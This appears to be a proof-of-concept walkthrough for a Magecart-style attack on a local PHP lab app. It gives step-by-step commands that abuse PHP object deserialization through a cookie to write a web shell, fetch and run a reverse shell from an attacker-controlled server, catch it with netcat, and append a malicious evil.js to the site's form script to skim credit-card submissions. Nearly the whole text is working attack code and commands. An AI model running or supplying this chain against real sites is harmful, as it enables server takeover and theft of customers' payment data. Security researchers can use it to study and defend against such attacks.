sec-js
4/11/2020 - 12:17 AM

Magecartpoc.txt

Exploit Steps

First, in the "app" directory run `php -a`

Then run the following commands:

```
include 'logger-class.php';
$logger = new Logger();
$logger->filename = "./shell.php";
$logger->last_log = '<?php system($_GET["cmd"]); ?>';
$serialized = serialize($logger);
$encoded = urlencode($serialized);
echo($encoded);
```

In order, we first include `logger-class.php`. Then we create a new instance of the Logger class and define some properties on that instance. We make the instance's filename `./shell.php`, which is where we will put the payload, and we set `last_log` as some PHP code that will grab whatever is in the `cmd` query parameter and execute as a system command. Next, we serialize the logger instance, we url encode the serialized string to make it safe for putting in our cookie, and then we finally print the resulting string, which is as follows:

`O%3A6%3A%22Logger%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22.%2Fshell.php%22%3Bs%3A8%3A%22last_log%22%3Bs%3A30%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%22%3B%7D`


Finally, visit your php server and replace the `uinfo` cookie with the encoded string above, or make the following curl request:

```
curl 'http://localhost:8080' -H 'Cookie: uinfo=O%3A6%3A%22Logger%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22.%2Fshell.php%22%3Bs%3A8%3A%22last_log%22%3Bs%3A30%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%22%3B%7D' 
```


Now, visiting `http://localhost:8080/shell.php` and adding a `cmd` query parameter will execute that shell command. For instance, going to `http://localhost:8080/shell.php?cmd=ls` will print the files in the app's current directory

Next, open up `exploit/reverse_shell.php` and update `$ip` to the IP of your host machine. Then, start a server in the `exploit` to upload the file. Here is a function in Bash that creates a simple server:
```
function server() {
        local port="${1:-5000}";
        sleep 1 && open "http://localhost:${port}/" &
        # Set the default Content-Type to `text/plain` instead of `application/octet-stream`
        # And serve everything as UTF-8 (although not technically correct, this doesn’t break anything for binary files)
        python -c $'import SimpleHTTPServer;\nmap = SimpleHTTPServer.SimpleHTTPRequestHandler.extensions_map;\nmap[""] = "text/plain";\nfor key, value in map.items():\n\tmap[key] = value + ";charset=UTF-8";\nSimpleHTTPServer.test();' "$port";
}
```
Then go to `http://localhost:8080/shell.php?cmd=curl%20http://<ip_and_port_of_server>/reverse_shell.php%20%3E%20reverse_shell.php`. This uploads the `reverse_shell.php` file to the app server.

Leave the server running, and in another terminal run `nc -nvl 9002` to set up a listener for our reverse shell, and then go to `http://localhost:8080/reverse_shell.php`. Your listener should connect and you now have a shell on the Docker instance.

Finally, we will inject malicious JavaScript into the page's JavaScript to steal credit cards. In your reverse shell, run `cd /usr/src/myapp/app/assets` and run `curl <ip_and_port_of_server>/evil.js >> form.js`. This appends the contents of evil.js to the app's form.js file.

You can now close the reverse shell and the simple server you had running. To see the fruits of the labor, in the `exploit` directory run `node server.js`. Now, visit whenever the form at localhost:8080 is sumbitted, the node server will print it's contents.